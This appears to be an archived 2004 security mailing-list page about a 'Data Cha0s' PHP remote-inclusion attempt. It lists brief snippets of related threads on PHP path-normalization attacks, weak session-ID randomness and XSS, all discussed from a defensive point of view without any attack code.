Data Cha0s PHP script attempt

From: Kirby Angell (kangell_at_alertra.com)
Date: 10/02/04

    Date: Fri, 01 Oct 2004 22:51:51 -0500
    To: Incidents List <incidents@securityfocus.com>

    • Re: Data Cha0s PHP script attempt
      ... > banning bots like this from our web server all together. ... > The attack attempts to trick the uptime.php form into loading the given ... > URL through one of the form variables. ... > which isn't a JPG at all, but itself is a PHP page. ...
      (Incidents)
    • [Full-disclosure] PHP filesystem attack vectors
      ... Systems Affected PHP and PHP+Suhosin ... PHP filesystem functions path normalization attack ... PHP filesystem functions path normalization attack details ...
      (Full-Disclosure)
    • PHP filesystem attack vectors
      ... Systems Affected PHP and PHP+Suhosin ... PHP filesystem functions path normalization attack ... PHP filesystem functions path normalization attack details ...
      (Bugtraq)
    • [Full-disclosure] Advisory: Weak RNG in PHP session ID generation leads to session hijacking
      ... PHP session ID generation uses RNG with weak properties ... session hijacking ... PHP utilizes a cryptographically weak random number generator to ... A PHP site becomes vulnerable to the attack described below if it ...
      (Full-Disclosure)
    • Re: PHP and SCRIPT_NAME variable
      ... then be able to perform XSS attack with something equivalant to: ... influence over the following PHP variable: ... as far as I know the elements of the $_SERVER array are filled by the webserver and therefore a manipulation through a php trick might by difficult. ... But it would be also quite interesting if php uses the items of this array to do something or if its just an array with no effect for the php scripts. ...
      (Vuln-Dev)